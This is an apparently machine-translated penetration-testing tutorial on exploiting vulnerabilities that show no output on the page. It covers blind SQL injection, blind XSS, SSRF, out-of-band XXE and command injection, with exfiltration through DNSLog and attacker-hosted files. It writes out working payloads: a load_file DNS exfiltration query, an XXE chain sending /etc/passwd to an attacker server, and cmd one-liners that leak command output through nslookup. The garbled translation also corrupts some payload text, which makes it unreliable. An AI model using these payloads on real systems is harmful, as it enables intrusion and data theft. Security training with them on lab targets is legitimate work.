0 x01 preface
In the process of penetration testing, it is impossible for the development to output the results to the page every time, that is, there is no echo of the vulnerability, so in this case, we can judge the existence of the vulnerability by dNSlog, or by using a Python HTTP service to judge, there are many ways, the following is mainly to analyze some cases.
0x02 No concept of echo
No output is displayed, that is, the payload is not output at the site, and further operations cannot be performed. During penetration testing, it is not always possible for vulnerability points to be output on the return page, so some non-echo exploitation is required.
0x03 No echo for different vulnerabilities
1. No response is displayed for SQL injection
SQL injection, the perennial top-ranking vulnerability of OWASP, is also common in no-echo. Of course, SQL injection in no echo has a certain solution. No echo is defined as the page does not output what we want. The following is an example of SQli-Labs to explain.
1.1 Bull blind
Boolean blind annotation, a type of blind annotation, when a website outputs the page information by returning true or false as a Boolean value of a query statement, the query statement is true and the page outputs the content; The query statement is false, and no content is displayed on the page. So here we can judge by constructing the equal sign, obtain the ASCII code of the corresponding character, and finally restore the data. The specific test process is as follows: 1. After id parameter 1 is passed, the page returns data. Obviously, error injection cannot be performed here.
2, add a single quotation mark after the pass parameter, the page returns empty, do not display error information, cannot use error injection.
And 1=1 and 1=2; and 1=2;
4. Determine that the length of database name is greater than 1 by using the length() function. ? id=1′ and length(database())>1 %23
5, the page returns null if the length is greater than 8, so the database name length is 8.
Get the ASCII code for the first character of the database name through the ASCII () function and substr () interception function. Id =1′ and ASCII (substr((select database()),1,1))>97 %23? Id =1′ and ASCII (substr((select database()),1,1))= 101% The ASCII code value of the first character of the database name is 115, and the corresponding character is S.
7. Change the interception position and determine the ASCII code value corresponding to the following characters. ? Id =1′ and ASCII (substr((select database()),2,1))= 101% 23
1.2 Delay blind injection
Delayed blind injection, a method of blind injection. When we can’t use error injection, error injection, and Boolean blind injection during penetration testing, the page returns the same regardless of whether the Boolean value is true or false, we can try to use delayed blind injection to determine whether the data is successful by the length of time the page is loaded. In PHP, there is an if() function with the syntax if(exp1,exp2,exp3). When exp1 returns true, it executes exp2, and when it returns false, it executes exp3. With the delay function sleep() to get the ASCII code of the corresponding data, and finally restore the data. The following examples will show how to do delayed blind bets today. 1. If you get the following page, you will return the same page whether the Boolean value is true or false, and you will not be able to use the Boolean blind.
2. Use the and splicing delay function to check whether the page has delayed output. First, record the page return time without using the delay function, which is 4.* seconds. After using sleep(5) to delay for 5 seconds, the page response time is 9.* seconds, indicating that the sleep() function we entered has been delayed, and there is a delay blind note here.
3. Determine the length of the database name through delayed injection. Each test found that the page delay returned when the length was equal to 8, indicating that the database name was 8 in length. ? id=2′ and if((length(database())=8),sleep(5),1) %23
4. Same as Boolean blind injection, the ASCII code is judged after the data of subquery is truncated, and when equal, the delay is 5 seconds. The result is an ASCII code of 115 for the first character. ? Id = 2 ‘and the if ((ASCII (substr ((select the database ()), 1, 1)) = 115), sleep (5), 1) % 23
5. Replace the truncated position and test the ASCII value of the following characters. Finally, the corresponding ASCII code value is 115 101 99 117 114 105 116 121. The database name is security through THE ASCII decoding tool.
Use DNSLog for SQL injection
The blind injection in SQL injection has been introduced before. The steps to obtain data through Boolean blind injection or delayed blind injection are very tedious. It not only needs to obtain one character by one, but also needs to carry out ASCII decoding, which takes a lot of time and energy. To speed up the penetration process and make it easier to get the data, here’s how to do SQL injection through DNSLog.
Dnslog
Dnslog, also known as DNS log, parses and displays the records of access to DNS services. It is often used to test the existence of vulnerabilities and carry out data when data cannot be obtained. Simply put, dNSLog is a server that records all accesses to it, including the domain name, IP address, and time of access. Then we can use subquery, splicing dNSlog domain name, and finally get the required data through DNS log.
The Load_file () function
The load_file() function in the database to load the contents of the server. Load_file (‘c:/1.txt’), reads the file and returns the content as a string. Using load_file() to obtain the data requires the following conditions: 1. The FILE is on the server. 2. Specify the FILE with the full path
UNC path
The UNC path is the way that you are. It conforms to the \ server name \ server resource format. In Windows, it is used to share files. For example, \192.168.1.1\ shared folder name.
Dnslog injection example demonstration
1. Open the instance site, which is obviously a blind site only.
2. Determine the number of fields by order BY.
3. On the dnslog website, apply for a dnslog domain name: pcijrt.dnslog.cn
4. Use the load_file function to splice the subquery of the database name to the dnslog domain name, followed by any nonexistent folder name. Finally, put this query into the federated query, and construct the payload as follows:
? Id =1 'union select 1,2,load_file(concat('//',(select database()),'.pcijrt.dnslog.cn/ABC ')) %23Copy the code
5. After the statement is executed, the database name is obtained in the dNSLog.
6. Modify the contents of the subquery to obtain other data.
2. No XSS command output is displayed
XSS has no echo, which is special. Generally, the judgment standard of XSS vulnerabilities is the pop-up box. However, there is such a case that, in a form submission, only the success or failure of submission will be displayed on the page after the content is submitted, but the submitted content will not be output. At this point, you need to attack through XSS blind calls. The following examples are explained through the Pikachu vulnerability practice platform:
2.1 XSS blind to play
1. Here is a function to submit views
2. Input content to submit freely, and tell us that the submission is successful, without returning the content I input to the page
3. After logging in to the background, you can see that there is data echo
4. The input pop-up statement will be executed successfully in the background
5. In the process of penetration test, we cannot log in to the background for viewing, so we need to blind type XSS, input the payload of the XSS platform, and wait for the administrator to view the content before biting.
2.2 Detecting vulnerability through DNSLog
payload:
<img src=http://xss.t7y3wc.dnslog.cn>
Copy the code
3. No SSRF output is displayed
SSRF is server request forgery, an attack constructed by an attacker to initiate requests through the server. Test code is as follows:
<? php echo file_get_contents($_GET['url']); ? >Copy the code
First, the vulnerability can be verified by visiting Baidu
If no output is displayed, no output is displayed and the page is empty
In this case, HTTP service authentication can be set up using dNSlog or Pythonhttp://172.16.29.2/ssrf_test.php?url=http://ssrf.02c6ot.dnslog.cn
2. HTTP service from Python
python3 -m http.server 4545
Copy the code
4. XXE No command output is displayed
Since XML is used to store and transfer data, there is no way for development to output content except for a real business need, which means you do read the contents of the file, but you can’t see them. XXE has no output. Of course, you can put the queried content before the domain name to record the data through the DNS log. Although XXE is not through DNSlog, it is also carried data. The process is as follows: In the victim’s website, we request the 1.xml file on the attacker’s VPS, and the content of the file is to put some data in the GET pass parameter to access 2.php. Then the content of 2.php is to save the data of the GET parameter, and put the data into 3.txt. The specific contents of the files are placed below. The IP address in the files should be the IP address of the attacker. The three files are also placed on the VPS of the attacker. 1.xml
<! ENTITY% all "<! ENTITY % Send SYSTEM 'http://ip address of the attacker /2.php? id=%file; '>">%all;Copy the code
2.php
<? php file_put_contents("3.txt",$_GET["id"],FILE_APPEND); ? >Copy the code
3.txt
Payload: <? The XML version = "1.0"? > <! DOCTYPE ANY[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> <!ENTITY % remote SYSTEM" http://server IP address /xxe/1.xml"> %remote; %send;] >Copy the code
5. No output is displayed after the command is executed
Simple command execution site
No response is displayed after any command is entered
5.1 Dnslog Determines that vulnerabilities exist
5.2Dnslog External data
5.2.1 Obtaining the Windows User Name
http://127.0.0.1/test_blind/exec.php?cmd=ping+%USERNAME%.io5a5i.dnslog.cn
Copy the code
5.2.2 Executing Other Commands
cmd /c whoami > temp && certutil -encode -f temp temp&&FOR /F "eol=- delims=" %i IN (temp) DO (set _=%i & cmd /c nslookup %_:~0,-1%.xxxx.ceye.io)&del temp
Copy the code
cmd /c ipconfig > temp && certutil -encode -f temp temp&&FOR /F "eol=- delims=" %i IN (temp) DO (set _=%i & cmd /c Nslookup %_:~0,40%.xxxx.ceye. IO & CMD /c nslookup %_:~40,-1%.xxxx.ceye. IO)&del tempCopy the code
The parameter passed the POST test. Procedure
The content of the passed parameter needs to be URL encoded
Post the participation
Dnslog gets the result
Base64 decoding gets the content
conclusion
In penetration testing, it is common to have no echo. It is impossible for the program to echo some operations to the page. In this case, we need to take away data to get the desired content. Of course, it’s better to be able to bounce the shell and execute commands by getting the shell, which is much more comfortable.
There are many, many cases of no echo, here is a brief introduction of a few, I hope readers can learn from the case of no echo how to conduct penetration testing, many methods, not fixed, learning ideas can be.